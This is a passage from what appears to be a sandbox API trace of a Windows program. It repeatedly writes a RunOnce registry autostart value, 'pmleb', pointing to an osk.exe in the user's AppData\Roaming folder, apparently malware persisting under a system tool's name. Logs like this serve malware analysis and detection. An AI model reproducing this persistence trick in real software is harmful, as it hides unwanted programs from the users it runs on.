uIDEvent=0x2310) returned 1 [0099.206] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.207] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.207] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.207] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.207] RegCloseKey (hKey=0x280) returned 0x0 [0099.208] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.208] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.208] SetTimer (hWnd=0x20280, nIDEvent=0x2311, uElapse=0xa, lpTimerFunc=0x0) returned 0x2311 [0099.208] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.222] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.222] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.222] KillTimer (hWnd=0x20280, uIDEvent=0x2311) returned 1 [0099.222] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.223] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.223] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.223] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.223] RegCloseKey (hKey=0x280) returned 0x0 [0099.223] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.223] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.224] SetTimer (hWnd=0x20280, nIDEvent=0x2312, uElapse=0xa, lpTimerFunc=0x0) returned 0x2312 [0099.224] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.249] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.249] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.250] KillTimer (hWnd=0x20280, uIDEvent=0x2312) returned 1 [0099.250] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.250] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.250] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.251] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.251] RegCloseKey (hKey=0x280) returned 0x0 [0099.251] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.251] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.251] SetTimer (hWnd=0x20280, nIDEvent=0x2313, uElapse=0xa, lpTimerFunc=0x0) returned 0x2313 [0099.251] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.253] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.253] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.253] KillTimer (hWnd=0x20280, uIDEvent=0x2313) returned 1 [0099.253] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 
[0099.253] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.253] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.254] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.254] RegCloseKey (hKey=0x280) returned 0x0 [0099.254] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.254] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.254] SetTimer (hWnd=0x20280, nIDEvent=0x2314, uElapse=0xa, lpTimerFunc=0x0) returned 0x2314 [0099.254] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.268] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.268] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.269] KillTimer (hWnd=0x20280, uIDEvent=0x2314) returned 1 [0099.271] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.272] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.272] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.277] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.278] RegCloseKey (hKey=0x280) returned 0x0 
[0099.278] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.278] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.278] SetTimer (hWnd=0x20280, nIDEvent=0x2315, uElapse=0xa, lpTimerFunc=0x0) returned 0x2315 [0099.278] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.284] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.284] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.284] KillTimer (hWnd=0x20280, uIDEvent=0x2315) returned 1 [0099.284] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.285] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.285] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.285] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.285] RegCloseKey (hKey=0x280) returned 0x0 [0099.285] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.285] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.285] SetTimer (hWnd=0x20280, nIDEvent=0x2316, uElapse=0xa, lpTimerFunc=0x0) returned 0x2316 [0099.286] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.300] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.300] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.300] KillTimer (hWnd=0x20280, uIDEvent=0x2316) returned 1 [0099.300] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.301] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.301] 
RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.301] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.301] RegCloseKey (hKey=0x280) returned 0x0 [0099.301] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.301] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.301] SetTimer (hWnd=0x20280, nIDEvent=0x2317, uElapse=0xa, lpTimerFunc=0x0) returned 0x2317 [0099.302] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.315] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.315] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.316] KillTimer (hWnd=0x20280, uIDEvent=0x2317) returned 1 [0099.316] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.317] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.317] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.317] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.317] RegCloseKey (hKey=0x280) returned 0x0 [0099.318] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.318] 
ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.318] SetTimer (hWnd=0x20280, nIDEvent=0x2318, uElapse=0xa, lpTimerFunc=0x0) returned 0x2318 [0099.318] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.331] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.331] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.331] KillTimer (hWnd=0x20280, uIDEvent=0x2318) returned 1 [0099.331] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.332] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.332] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.332] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.332] RegCloseKey (hKey=0x280) returned 0x0 [0099.332] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.333] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.333] SetTimer (hWnd=0x20280, nIDEvent=0x2319, uElapse=0xa, lpTimerFunc=0x0) returned 0x2319 [0099.333] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.349] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.349] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.349] KillTimer (hWnd=0x20280, uIDEvent=0x2319) returned 1 [0099.349] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.350] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.350] RegCreateKeyExA (in: hKey=0x80000001, 
lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.350] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.350] RegCloseKey (hKey=0x280) returned 0x0 [0099.350] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.350] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.351] SetTimer (hWnd=0x20280, nIDEvent=0x231a, uElapse=0xa, lpTimerFunc=0x0) returned 0x231a [0099.351] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.362] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.362] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.362] KillTimer (hWnd=0x20280, uIDEvent=0x231a) returned 1 [0099.362] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.363] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.363] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.363] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.363] RegCloseKey (hKey=0x280) returned 0x0 [0099.363] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.363] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 
[0099.364] SetTimer (hWnd=0x20280, nIDEvent=0x231b, uElapse=0xa, lpTimerFunc=0x0) returned 0x231b [0099.364] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.378] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.378] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.378] KillTimer (hWnd=0x20280, uIDEvent=0x231b) returned 1 [0099.378] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.379] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.379] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.379] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.379] RegCloseKey (hKey=0x280) returned 0x0 [0099.379] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.379] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.379] SetTimer (hWnd=0x20280, nIDEvent=0x231c, uElapse=0xa, lpTimerFunc=0x0) returned 0x231c [0099.379] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.393] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.393] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.393] KillTimer (hWnd=0x20280, uIDEvent=0x231c) returned 1 [0099.393] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.394] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.394] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, 
dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.394] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.394] RegCloseKey (hKey=0x280) returned 0x0 [0099.394] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.394] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.394] SetTimer (hWnd=0x20280, nIDEvent=0x231d, uElapse=0xa, lpTimerFunc=0x0) returned 0x231d [0099.394] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.409] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.409] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.409] KillTimer (hWnd=0x20280, uIDEvent=0x231d) returned 1 [0099.409] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.409] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.409] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.410] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.410] RegCloseKey (hKey=0x280) returned 0x0 [0099.410] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.410] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.410] SetTimer (hWnd=0x20280, nIDEvent=0x231e, uElapse=0xa, lpTimerFunc=0x0) returned 0x231e 
[0099.410] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.424] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.424] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.425] KillTimer (hWnd=0x20280, uIDEvent=0x231e) returned 1 [0099.425] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.425] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.425] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.426] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.426] RegCloseKey (hKey=0x280) returned 0x0 [0099.426] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.426] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.426] SetTimer (hWnd=0x20280, nIDEvent=0x231f, uElapse=0xa, lpTimerFunc=0x0) returned 0x231f [0099.426] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.440] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.440] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.440] KillTimer (hWnd=0x20280, uIDEvent=0x231f) returned 1 [0099.440] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.441] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.441] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: 
phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.441] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.441] RegCloseKey (hKey=0x280) returned 0x0 [0099.441] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.441] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.441] SetTimer (hWnd=0x20280, nIDEvent=0x2320, uElapse=0xa, lpTimerFunc=0x0) returned 0x2320 [0099.442] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.456] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.456] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.456] KillTimer (hWnd=0x20280, uIDEvent=0x2320) returned 1 [0099.456] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.456] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.456] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.457] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.457] RegCloseKey (hKey=0x280) returned 0x0 [0099.457] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.457] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.457] SetTimer (hWnd=0x20280, nIDEvent=0x2321, uElapse=0xa, lpTimerFunc=0x0) returned 0x2321 [0099.457] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: 
lpMsg=0x33f7fc) returned 1 [0099.471] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.471] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.471] KillTimer (hWnd=0x20280, uIDEvent=0x2321) returned 1 [0099.472] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.473] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.474] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.475] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.475] RegCloseKey (hKey=0x280) returned 0x0 [0099.475] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.475] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.475] SetTimer (hWnd=0x20280, nIDEvent=0x2322, uElapse=0xa, lpTimerFunc=0x0) returned 0x2322 [0099.475] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.488] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.488] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.488] KillTimer (hWnd=0x20280, uIDEvent=0x2322) returned 1 [0099.488] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.489] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.489] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.489] RegSetValueExA (in: 
